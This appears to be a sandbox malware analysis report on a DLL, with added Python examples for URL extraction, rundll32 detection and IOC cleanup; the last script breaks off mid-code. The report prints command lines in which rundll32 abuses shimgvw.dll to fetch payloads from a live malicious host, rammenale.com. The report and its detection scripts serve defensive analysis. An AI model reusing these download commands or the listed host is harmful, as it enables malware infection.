Source: rundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpuk
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpw
Source: rundll32.exe, 00000003.00000002.2054268818.0000000002A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpxe.muiE
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007B71000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C1B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.000000000889F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpz
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/k
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/q
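The string hits above are one URL stored many times in process memory, each copy followed by whatever bytes happened to sit next to it. The extractor below is an added example, not part of the Joe Sandbox report: it pulls URL-shaped strings out of a raw memory dump and collapses the junk-suffixed variants back onto the clean URL. The sample dump is constructed for the example, and the canonicalization rule (a shorter hit that is a prefix of a longer one and ends in a file extension or a slash wins) is an assumption of this example, not the sandbox's method.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Constructed sample: a fake process-memory region in which the download URL is
# stored several times, each copy followed by whatever bytes happened to be
# adjacent (a NUL, another string, a path). This is not a dump from the report.
SAMPLE_DUMP = (
    b"\x00\x00https://rammenale.com/for2/aclog.txt\x00\x00\x00"
    b"\x90\x90https://rammenale.com/for2/aclog.txtentdll\x00"
    b"https://rammenale.com/for2/aclog.txtC:\\Users\\user\\AppData\x00"
    b"https://rammenale.com/for2/regit.tmp\x00"
    b"\xffhttps://rammenale.com/for2/regit.tmp6634-1003\x00"
    b"junk\x01\x02https://rammenale.com/q\x00"
    b"\x00https://rammenale.com/for2/aclogtxt\x00"
)

# RFC 3986 URL characters; anything else (NUL, backslash, high bytes) ends a hit.
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")

# A candidate is considered a complete URL if it ends in ".ext" or in a slash
# (assumption for this example; it matches the aclog.txt / regit.tmp case).
EXT_OR_DIR_RE = re.compile(r"(?:\.[A-Za-z0-9]{1,4}|/)$")


def extract_urls(blob: bytes) -> list[str]:
    """Return every http(s) URL-looking run of bytes in the blob, in order."""
    return [m.group(0).decode("ascii", errors="replace") for m in URL_RE.finditer(blob)]


def canonicalize(url: str, candidates: set[str]) -> str:
    """Collapse a junk-suffixed hit onto the longest complete URL that is a prefix of it."""
    prefixes = [
        c for c in candidates
        if c != url and url.startswith(c) and EXT_OR_DIR_RE.search(c)
    ]
    return max(prefixes, key=len) if prefixes else url


def collapse_url_strings(blob: bytes) -> dict[str, int]:
    """Map each canonical URL to the number of raw hits that collapsed onto it."""
    raw = extract_urls(blob)
    candidates = set(raw)
    counts: dict[str, int] = defaultdict(int)
    for hit in raw:
        counts[canonicalize(hit, candidates)] += 1
    return dict(counts)


if __name__ == "__main__":
    for url, n in sorted(collapse_url_strings(SAMPLE_DUMP).items()):
        print(f"{n:3d}  {url}")
```

A junk suffix that is itself URL-safe (such as "aclog.txtentdll") collapses correctly only when the clean URL also appears somewhere in the dump; the variant without the dot ("aclogtxt") is left as its own entry, which is the right answer because nothing in the data proves it is the same URL.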
Source: unknown Network traffic detected: HTTP traffic over port 443 in both directions on local ports 49705, 49706, 49707, 49708, 49711 and 49712
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49705, :49706, :49707, :49708, :49711 and :49712, version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B92B3BD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B93612B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B92B07B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B93B869
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B92B71C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B935C80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F9EB71C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F9F5C80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F9EB3BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F9F612B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F9EB07B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F9FB869
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6B925570 appears 45 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6F9E5570 appears 45 times
Source: QEydjQdRxs.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engine Classification label: mal88.evad.winDLL@20/0@1/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
Source: QEydjQdRxs.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QEydjQdRxs.dll,mydllmain
Source: QEydjQdRxs.dll Virustotal: Detection: 8%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\QEydjQdRxs.dll,mydllmain
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
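The process tree above is the pattern behind the Sigma hits listed in this report: rundll32.exe loading a DLL from a user-writable directory, rundll32.exe spawning another rundll32.exe, and rundll32.exe calling the ImageView_Fullscreen export of shimgvw.dll with an https:// URL in place of a local image path. The script below is an added example, not part of the report and not the logic of any published Sigma rule; it runs those checks over a constructed list of process-creation events modelled on the tree, plus three invented events (two benign rundll32 invocations that must not fire, and a .txt-named module under Temp for the spoofed-extension case). The event field names, rule tags, DLL extension allow-list and user-writable path pattern are assumptions of the example.

```python
from __future__ import annotations

import ntpath
import re

# Constructed process-creation events modelled on the report's process tree.
# PIDs and the last three events are invented for the example.
EVENTS = [
    {"pid": 3, "parent_image": r"C:\Windows\System32\loaddll32.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\Desktop\QEydjQdRxs.dll,mydllmain"},
    {"pid": 4, "parent_image": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1'},
    {"pid": 5, "parent_image": r"C:\Windows\SysWOW64\rundll32.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt"},
    {"pid": 6, "parent_image": r"C:\Windows\SysWOW64\rundll32.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp"},
    # Invented benign event: the same export opening a local picture.
    {"pid": 100, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\Windows\System32\shimgvw.dll",ImageView_Fullscreen C:\Users\user\Pictures\holiday.jpg'},
    # Invented benign event: Control Panel applet launch.
    {"pid": 101, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
    # Invented malicious event: a module dropped under Temp with a .txt extension.
    {"pid": 102, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\AppData\Local\Temp\invoice.txt,DllRegisterServer"},
]

TOKEN_RE = re.compile(r'(?:"[^"]*"|[^\s"])+')   # one argument; quoted spans stay together
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"^[A-Za-z]:\\Users\\|\\AppData\\|\\Temp\\", re.IGNORECASE)
DLL_EXTENSIONS = {".dll", ".cpl", ".ocx", ".ax", ".drv"}   # assumed allow-list


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line into arguments, dropping the quote characters."""
    return [t.replace('"', "") for t in TOKEN_RE.findall(cmdline)]


def check_rundll32(event: dict) -> list[tuple[str, str]]:
    """Return (rule_tag, detail) pairs for one process-creation event."""
    findings: list[tuple[str, str]] = []
    if ntpath.basename(event["image"]).lower() != "rundll32.exe":
        return findings
    args = tokenize(event["cmdline"])
    if len(args) < 2:
        return findings
    module = args[1].split(",", 1)[0]          # "path\module.dll,Export" -> path
    if USER_WRITABLE_RE.search(module):
        findings.append(("user_writable_module", module))
    if ntpath.splitext(module)[1].lower() not in DLL_EXTENSIONS:
        findings.append(("non_dll_module_extension", module))
    for arg in args[2:]:                        # export arguments: a URL means a remote resource
        if URL_RE.match(arg):
            findings.append(("url_argument", arg))
    if ntpath.basename(event["parent_image"]).lower() == "rundll32.exe":
        findings.append(("rundll32_parent", event["parent_image"]))
    return findings


def scan(events: list[dict]) -> dict[int, list[tuple[str, str]]]:
    """Map pid -> findings for every event that triggered at least one rule."""
    return {e["pid"]: f for e in events if (f := check_rundll32(e))}


if __name__ == "__main__":
    for pid, findings in scan(EVENTS).items():
        for tag, detail in findings:
            print(f"pid {pid}: {tag}: {detail}")
```

The two benign events pass because the module lives under System32 with a .dll extension, the argument is a local path rather than a URL, and the parent is explorer.exe; the report's rundll32 -> rundll32 -> URL chain trips two rules at once, which is a stronger signal than either alone.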
Source: C:\Windows\System32\loaddll32.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: QEydjQdRxs.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B93BF81 push ecx; ret 0_2_6B93BF94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F9FBF81 push ecx; ret 3_2_6F9FBF94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00446003 push ecx; iretd 4_2_00446004
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00443513 push ecx; iretd 4_2_00443514
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_004461D3 push ecx; iretd 4_2_004461D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_004431A3 push ecx; iretd 4_2_004431A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00446433 push ecx; iretd 4_2_00446434
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_092ED728 push ebx; retf 5_2_092ED7B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_092ED708 push ebx; retf 5_2_092ED7B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_092ED795 push ebx; retf 5_2_092ED7B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_092EFB78 pushad; iretd 5_2_092EFB79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_07EDF9B4 push eax; iretd 7_2_07EDF9BD
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX (reported 44 times across the rundll32.exe instances)
Source: C:\Windows\System32\loaddll32.exe API coverage: 8.3 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 6.5 %
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5960 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2468 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B921B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B9338F4 FindFirstFileExW
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F9E1B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F9F38F4 FindFirstFileExW
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 30000 (two instances)
Source: rundll32.exe process memory (instances 5, 6, 7, 8, 0xB and 0xC) Binary or memory string: Hyper-V RAW (the characters "5", "gG", "P", "0" and "8h" that follow some copies are adjacent bytes, not part of the string)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B9253EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B934AF5 GetProcessHeap
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B924EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B92DCFD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F9E4EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F9EDCFD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F9E53EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 131.153.206.231 443
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B9255EB cpuid
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6B92503D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
MITRE ATT&CK matrix

Techniques with signature hits, grouped by tactic (the number in parentheses is the counter shown next to the technique in the report's matrix):

Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (111); DLL Side-Loading (1)
Defense Evasion: Virtualization/Sandbox Evasion (11); Process Injection (111); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Rundll32 (1); DLL Side-Loading (1)
Discovery: System Time Discovery (1); Security Software Discovery (21); Virtualization/Sandbox Evasion (11); File and Directory Discovery (1); System Information Discovery (12)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14)

No technique received a signature hit under Reconnaissance, Resource Development, Initial Access, Execution, Credential Access, Lateral Movement, Exfiltration or Impact.
Behavior graph (ID 1500943, sample QEydjQdRxs.dll, start date 29/08/2024, architecture WINDOWS, score 88), flattened from the report's graph view; bracketed numbers are the per-node count badges as extracted.

Sample-level signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Sigma detected: rundll32 run dll from internet; 3 other signatures

Process tree:
  • loaddll32.exe [1] (started)
    • rundll32.exe (signature: System process connects to network (likely due to code injection or exploit))
    • rundll32.exe
      • rundll32.exe (contacts rammenale.com, 131.153.206.231, port 443, local ports 49705 and 49706, SS-ASHUS, United States)
      • rundll32.exe
    • cmd.exe [1]
      • rundll32.exe
        • rundll32.exe [12]
        • rundll32.exe [12]
    • 2 other processes

Source | Detection | Scanner
QEydjQdRxs.dll | 5% | ReversingLabs
QEydjQdRxs.dll | 8% | Virustotal
QEydjQdRxs.dll | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner
rammenale.com | 1% | Virustotal
Source | Detection | Scanner | Label
Almost every entry below is one of the same two URLs with a few trailing bytes of adjacent memory attached (the carved string does not stop where the URL stops: "C:", "entdll", "xe.mui" and "indowsINetCookies" are the beginnings of neighbouring path strings), so "regit.tmp$u", "regit.tmpent" and "aclog.txtM" are not distinct indicators. The clean forms are https://rammenale.com/for2/regit.tmp and https://rammenale.com/for2/aclog.txt; the bare host https://rammenale.com/ is what Avira rates "safe". "Browse" on the Virustotal rows is the report's link text.
https://rammenale.com/for2/regit.tmp$u | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclogY | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtM | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpent | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtPR | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpft | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp4kJ | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp( | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpent | 0% | Virustotal | Browse
https://rammenale.com/for2/aclog.txtM | 1% | Virustotal | Browse
https://rammenale.com/for2/regit.tmpPR5 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtT | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp) | 100% | Avira URL Cloud | malware
https://rammenale.com/T | 0% | Avira URL Cloud | safe
https://rammenale.com/for2/aclog.txtR | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpft | 0% | Virustotal | Browse
https://rammenale.com/for2/aclog.txt42 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt6634-1003( | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp% | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpry | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtO | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtZ | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtR | 1% | Virustotal | Browse
https://rammenale.com/for2/aclog.txt4? | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txte | 100% | Avira URL Cloud | malware
https://rammenale.com/d | 0% | Avira URL Cloud | safe
https://rammenale.com/for2/regit.tmpsC: | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtO | 1% | Virustotal | Browse
https://rammenale.com/for2/aclog.txt) | 100% | Avira URL Cloud | malware
https://rammenale.com/k | 0% | Avira URL Cloud | safe
https://rammenale.com/for2/regit.tmp% | 1% | Virustotal | Browse
https://rammenale.com/for2/regit.tmpry | 0% | Virustotal | Browse
https://rammenale.com/for2/aclog.txte | 1% | Virustotal | Browse
https://rammenale.com/for2/regit.tmpsC: | 1% | Virustotal | Browse
https://rammenale.com/for2/aclog.txt4 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtenth | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt4Y | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt4FA | 100% | Avira URL Cloud | malware
https://rammenale.com/q | 0% | Avira URL Cloud | safe
https://rammenale.com/for2/aclog.txt3 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt0O | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt0 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt: | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpn | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtF | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpw | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpxe.muiE | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpz | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog | 0% | Virustotal | Browse
https://rammenale.com/for2/regit.tmps | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpC: | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpu | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt6634-1003 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt? | 100% | Avira URL Cloud | malware
https://rammenale.com/ | 0% | Avira URL Cloud | safe
https://rammenale.com/for2/regit.tmp8a5 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt4u | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp6634-1003 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtry | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtQw | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtrw | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpg | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmph | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt4n | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt60 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtentindowsINetCookies | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt4r | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp08 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpP | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtfw | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtC: | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt& | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt% | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt4~ | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtft | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpA | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtk | 100% | Avira URL Cloud | malware
https://rammenale.com//9 | 0% | Avira URL Cloud | safe
https://rammenale.com/for2/regit.tmp; | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txti | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclogtxt | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtv | 100% | Avira URL Cloud | malware
https://rammenale.com/6 | 0% | Avira URL Cloud | safe
https://rammenale.com/for2/aclog.txts | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp4s5 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp0 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpmp | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp4X | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtentdll8 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtx | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp7 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpc4u | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp4Zfrh | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txt4$ | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/aclog.txtdT | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmp4 | 100% | Avira URL Cloud | malware
https://rammenale.com/for2/regit.tmpuk | 100% | Avira URL Cloud | malware
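Collapsing a list like the one above back to its real indicators is mechanical once the junk-suffix pattern is recognised. The script below is an added example (my code, not the report's and not a Joe Sandbox feature): it parses rows in the fused "URL<pct>%<scanner><label>" layout, using a dozen rows copied from the table as constructed input, cuts each URL at the first known file extension (the extension list is an assumption fitted to this report) or, when there is none, at the last path separator, and aggregates the scanner verdicts per canonical URL. The URL/percentage boundary is ambiguous when the junk ends in a digit, so the parser anchors on the verdict text instead of guessing.

```python
"""Added example: collapse sandbox memory-string URL hits into canonical IOCs.

Strings carved from process memory are not terminated where the URL ends, so
one URL shows up dozens of times with different trailing bytes ("regit.tmp$u",
"aclog.txtM", ...) and each variant is scanned and listed on its own.  This
parses the fused table rows, strips the junk and aggregates the verdicts.
SAMPLE_ROWS are copied from the report's table; KNOWN_EXTENSIONS is an
assumption tuned to this report, not a Joe Sandbox constant."""
from __future__ import annotations

import re
from dataclasses import dataclass

SAMPLE_ROWS = [
    "https://rammenale.com/for2/regit.tmp$u100%Avira URL Cloudmalware",
    "https://rammenale.com/for2/aclogY100%Avira URL Cloudmalware",
    "https://rammenale.com/for2/aclog.txtM100%Avira URL Cloudmalware",
    "https://rammenale.com/for2/regit.tmpent0%VirustotalBrowse",
    "https://rammenale.com/for2/aclog.txtM1%VirustotalBrowse",
    "https://rammenale.com/T0%Avira URL Cloudsafe",
    "https://rammenale.com/for2/aclog.txt42100%Avira URL Cloudmalware",
    "https://rammenale.com/for2/regit.tmpxe.muiE100%Avira URL Cloudmalware",
    "https://rammenale.com/for2/regit.tmp100%Avira URL Cloudmalware",
    "https://rammenale.com/for2/aclog.txt100%Avira URL Cloudmalware",
    "https://rammenale.com//90%Avira URL Cloudsafe",
    "https://rammenale.com/for2/aclogtxt100%Avira URL Cloudmalware",
]

# Row layout: <url><pct>%<scanner><label>.  Scanner names and labels are a closed set.
ROW_RE = re.compile(r"^(?P<rest>.*?)(?P<scanner>Avira URL Cloud|Virustotal)(?P<label>malware|safe|Browse)$")
# File extensions that end a real URL in this report (assumption; extend per sample).
KNOWN_EXTENSIONS = ("tmp", "txt")
EXT_RE = re.compile(r"^(https?://[^/]+/[^?#]*?\.(?:%s))" % "|".join(KNOWN_EXTENSIONS))


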